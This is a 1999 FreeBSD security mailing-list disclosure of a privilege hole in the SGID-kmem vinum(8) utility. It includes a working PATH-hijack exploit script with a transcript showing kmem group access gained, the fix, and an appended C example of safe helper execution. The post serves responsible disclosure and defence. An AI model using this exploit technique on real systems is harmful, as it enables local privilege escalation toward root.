Date:      Wed, 27 Jan 1999 10:50:39 -0700 (MST)
From:      Paul Hart <hart@iserver.com>
To:        freebsd-security@FreeBSD.ORG
Subject:   Large security hole in vinum(8) in 3.0-RELEASE
Message-ID:  <Pine.BSF.3.96.990127103410.19271A-100000@anchovy.orem.iserver.com>

On January 13, 1999 (two weeks ago), I notified the FreeBSD security
officer and the author of vinum(8) of a large security hole that affects
vinum(8) in 3.0-RELEASE.  It seems appropriate to disclose this hole now
in a public forum, seeing as the author has corrected the problem.

In at least 3.0-RELEASE /sbin/vinum is SGID kmem and can be leveraged to
run arbitrary code with an EGID of kmem.  Now this is not as bad a hole as,
say, a root compromise, but it can lead to a number of serious local
attacks against a FreeBSD host, such as examining the contents of /dev/mem or
/dev/kmem, which could in turn be leveraged for root access.

Here is a transcript of what I mean:

    % uname -r
    3.0-RELEASE
    % id
    uid=100(hart) gid=100(hart) groups=100(hart), 0(wheel)
    % ./vino
    $ id
    uid=100(hart) gid=100(hart) egid=2(kmem) groups=2(kmem), 100(hart), 0(wheel)
    $ 

Whoops!  My sample exploit code (vino) is:

    #!/bin/sh
    PATH=/tmp:$PATH
    echo "#!/bin/sh
    exec /bin/sh" > /tmp/mkdir
    chmod 755 /tmp/mkdir
    /sbin/vinum

Looking through the code to vinum(8), the problem can be traced to the
dangerous use of system(3) in a privileged program.  But as it turns out,
vinum(8) doesn't need to be SGID.  From discussion with the author, this
installation mode appears to have crept into the vinum(8) Makefile from
the Makefile for ccdconfig(8) by accident.  So this turns out to be easy
to fix -- simply remove the SGID bit from /sbin/vinum. 

Paul Hart

--
Paul Robert Hart        ><8>  ><8>  ><8>        Verio Web Hosting, Inc.
hart@iserver.com        ><8>  ><8>  ><8>        http://www.iserver.com/
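As an added illustration (not vinum's code, the author's, or the committed fix), the defect class the message describes, a set-id program invoking a helper through system(3) and thereby through the caller's PATH, beside the shape a privileged program should use instead: drop the set-gid before running anything, pass an absolute path, a fixed environment, and never involve a shell. The function name and the PATH value are assumptions made for this example.

```c
/* Added example: how a set-id program should run a helper instead of
 * calling system(3). system(3) runs "/bin/sh -c cmd", and that shell
 * resolves a bare command name such as "mkdir" through the caller's PATH,
 * so a set-gid binary inherits whatever a local user placed there.
 * The replacement below never consults the inherited environment. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Fixed environment handed to the child: no caller-supplied PATH.
 * (The PATH value is an assumption for this example.) */
static char *const safe_env[] = { "PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL };

/* Run prog (an absolute path) with argv, without a shell and without the
 * inherited environment, after giving up any set-gid privilege.
 * Returns the child's exit status (0-255), or -1 when prog is not an
 * absolute path, fork/wait fails, or the child died from a signal. */
int run_unprivileged(const char *prog, char *const argv[])
{
    if (prog == NULL || prog[0] != '/')
        return -1;              /* refuse anything a PATH lookup could resolve */

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Drop the effective gid (e.g. kmem) to the real gid before exec. */
        if (setgid(getgid()) != 0)
            _exit(127);
        execve(prog, argv, safe_env);
        _exit(127);             /* exec failed: same convention as sh(1) */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char *const argv_true[] = { "true", NULL };
    /* A relative name is rejected outright; an absolute one is run. */
    printf("relative: %d\n", run_unprivileged("true", argv_true));
    printf("absolute: %d\n", run_unprivileged("/bin/true", argv_true));
    return 0;
}
```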




